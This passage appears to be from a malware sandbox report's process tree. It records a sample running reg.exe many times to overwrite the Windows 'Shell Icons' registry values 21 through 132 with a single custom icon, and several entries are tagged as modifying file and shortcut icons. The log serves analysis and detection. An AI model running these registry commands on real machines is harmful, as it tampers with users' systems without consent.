        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 21 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5728
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 22 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:2948
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 23 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5420
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 24 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:1500
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 25 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:2644
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 26 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5564
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 27 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5608
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 28 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2376
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 29 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        Modifies Shortcut Icons
        
        PID:5456
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 30 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3564
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 31 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5540
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 32 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:484
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 33 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3800
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 34 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5576
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 35 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5844
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 36 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3576
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 37 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2948
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 38 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:1032
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 39 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:380
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 40 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5176
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 41 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5324
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 42 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5596
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 43 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5908
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 44 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5676
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 45 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:2756
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 46 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2104
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 47 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3876
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 48 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5980
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 49 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5576
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 50 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5728
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 51 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2948
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 52 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5608
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 53 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5580
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 54 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5596
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 55 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5148
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 56 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5420
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 57 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:3720
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 58 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5796
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 59 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5536
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 60 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5704
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 61 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4636
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 62 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5372
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 63 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3268
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 64 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5460
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 65 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:6000
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 66 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5364
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 67 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5700
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 68 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5280
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 69 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5124
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 70 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5564
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 71 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3932
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 72 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3352
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 73 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3052
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 74 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5820
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 75 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:1032
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 76 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2112
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 77 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:380
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 78 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5632
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 79 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5176
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 80 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5580
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 81 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5588
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 82 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5616
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 83 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5584
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 84 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2928
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 85 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5292
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 86 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5148
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 87 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5336
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 88 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5256
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 89 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5420
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 90 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5236
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 91 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5676
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 92 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:1500
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 93 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:2756
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 94 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4992
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 95 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5508
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 96 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:4724
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 97 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3268
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 98 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5460
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 99 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:6000
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 100 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5364
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 101 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5700
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 102 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5280
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 103 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5124
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 104 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5564
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 105 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3932
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 106 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4228
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 107 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5512
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 108 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:1632
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 109 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5376
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 110 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:2112
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 111 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:380
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 112 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5632
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 113 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5176
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 114 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5308
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 115 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:4208
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 116 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5596
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 117 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5624
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 118 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5616
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 119 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5584
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 120 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2928
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 121 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5292
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 122 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5332
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 123 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5908
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 124 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2144
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 125 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5676
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 126 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:1500
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 127 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:2756
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 128 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3744
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 129 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:5372
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 130 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:3876
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 131 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5980
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 132 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
